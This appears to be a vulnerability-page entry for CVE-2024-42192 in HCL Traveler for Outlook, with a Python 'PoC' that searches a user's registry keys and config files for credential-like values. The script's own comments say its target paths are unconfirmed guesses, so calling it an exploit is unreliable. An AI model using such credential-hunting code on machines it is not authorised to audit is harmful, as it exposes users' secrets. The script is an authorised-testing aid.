HCL Traveler for Microsoft Outlook (HTMO) is susceptible to credential leakage, which could allow an attacker to access other computers or applications.
Affected: all affected versions of HCL Traveler for Microsoft Outlook (HTMO) that have not been patched.
PoC / Exploit Code
⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2024-42192 - HCL Traveler for Microsoft Outlook Credential Leakage PoC
# This PoC demonstrates how an attacker with local access could potentially
# extract credentials stored by the HTMO Outlook plugin.
# Note: This is for educational and authorized testing purposes only.
import os
import winreg
import json
# Candidate registry subkeys, relative to a hive root, that the scan inspects.
# NOTE(review): these are heuristic guesses. Nothing on this page confirms that
# HTMO stores credentials under any of them, so verify against the vendor
# advisory before treating a hit or a miss as meaningful.
REGISTRY_PATHS = [
    r"SOFTWARE\HCL\Traveler",
    r"SOFTWARE\HCL\Notes",
    r"SOFTWARE\IBM\Notes",
    r"SOFTWARE\Microsoft\Office\Outlook\Addins\HCL Traveler",
]

# Candidate per-user files. Environment variables such as %APPDATA% are
# expanded once, when the module is loaded.
# NOTE(review): the file names are assumptions as well -- confirm them on a
# reference installation.
CONFIG_FILE_PATHS = [
    os.path.expandvars(template)
    for template in (
        r"%APPDATA%\HCL\Traveler\config.xml",
        r"%LOCALAPPDATA%\HCL\Traveler\credentials.dat",
        r"%APPDATA%\Microsoft\Outlook\HTMO_settings.ini",
    )
]
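def check_registry_credentials():
    """Collect HKCU registry values whose names look credential-related.

    Every subkey listed in REGISTRY_PATHS is opened read-only under
    HKEY_CURRENT_USER. A value is recorded when its name contains one of a
    few keywords (case-insensitive substring match). Subkeys that do not
    exist or cannot be opened are skipped silently.

    Returns:
        list[dict]: one dict per match with the keys "registry_path",
        "name" and "value". "value" is the raw registry data and may be a
        live secret, so callers should not print or log it verbatim.
    """
    # Substring matching is a heuristic: a short keyword such as 'key' also
    # matches unrelated value names, so a hit is a lead to review, not proof
    # that a credential is stored there.
    keywords = ('pass', 'token', 'cred', 'auth', 'key')
    found_creds = []
    for path in REGISTRY_PATHS:
        try:
            # Only the current user's hive is inspected.
            key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, path, 0, winreg.KEY_READ)
        except (FileNotFoundError, PermissionError):
            continue
        # The handle is used as a context manager so it is closed even if
        # enumeration raises something unexpected.
        with key:
            index = 0
            while True:
                try:
                    name, value, _ = winreg.EnumValue(key, index)
                except OSError:
                    # EnumValue raises OSError once the index runs past the
                    # last value of the key.
                    break
                if any(kw in name.lower() for kw in keywords):
                    found_creds.append({"registry_path": path, "name": name, "value": value})
                index += 1
    return found_creds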
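def check_file_credentials():
    """Check the candidate files for credential-related keywords.

    Each path in CONFIG_FILE_PATHS is opened as text (undecodable bytes are
    ignored) and searched, case-insensitively, for a few keywords.

    Returns:
        list[dict]: one dict per noteworthy file. A readable file that
        contains a keyword yields {"file", "preview"}; a file that exists
        but could not be read yields {"file", "status"}. "preview" holds up
        to 500 characters of raw file content and may include a secret, so
        callers should not print or log it.
    """
    keywords = ('password', 'token', 'credential')
    found_creds = []
    for filepath in CONFIG_FILE_PATHS:
        # Harmless if the entry was already expanded when the list was built.
        expanded = os.path.expandvars(filepath)
        # Open directly instead of testing os.path.exists() first: the file
        # can disappear between the check and the open, and only one kind of
        # read failure was handled before.
        try:
            with open(expanded, 'r', errors='ignore') as f:
                content = f.read()
        except FileNotFoundError:
            continue
        except PermissionError:
            found_creds.append({"file": expanded, "status": "access_denied"})
            continue
        except OSError:
            # Any other I/O failure: report the path as unread rather than
            # aborting the whole scan.
            found_creds.append({"file": expanded, "status": "read_error"})
            continue
        if any(kw in content.lower() for kw in keywords):
            found_creds.append({"file": expanded, "preview": content[:500]})
    return found_creds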
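def main():
    """Run the registry and file scans and print a summary.

    Registry values are reported by location, type and length only. The
    data itself is never echoed, because console output commonly ends up in
    scrollback, transcripts and tickets, and an audit run should not create
    a second copy of a secret. Files that could not be read are listed
    separately from files in which a keyword was found.
    """
    print("[*] CVE-2024-42192 - HTMO Credential Leakage Scanner")
    print("[*] Scanning for potentially leaked credentials...\n")
    reg_creds = check_registry_credentials()
    file_creds = check_file_credentials()

    # Entries carrying a "status" key were not read, so they are not
    # evidence of a stored credential and are reported on their own.
    readable = [entry for entry in file_creds if "status" not in entry]
    unreadable = [entry for entry in file_creds if "status" in entry]

    if reg_creds:
        print(f"[!] Found {len(reg_creds)} potential credentials in registry:")
        for cred in reg_creds:
            # A single backslash separates the subkey from the value name.
            print(f" Path: {cred['registry_path']}\\{cred['name']}")
            value = cred['value']
            if isinstance(value, (str, bytes)):
                print(f" Value: <redacted {type(value).__name__}, length {len(value)}>")
            else:
                print(f" Value: <redacted {type(value).__name__}>")
    if readable:
        print(f"[!] Found {len(readable)} potential credential files:")
        for cred in readable:
            print(f" File: {cred['file']}")
    if unreadable:
        print(f"[*] {len(unreadable)} candidate files could not be read:")
        for cred in unreadable:
            print(f" File: {cred['file']} ({cred['status']})")
    if not reg_creds and not file_creds:
        # The checked locations are heuristic, so an empty result says
        # nothing about the installed version or patch level.
        print("[+] No credential-like entries found in the checked locations "
              "(this does not confirm the system is patched).")


# Run the scan only when executed as a script, not when imported.
if __name__ == "__main__":
    main()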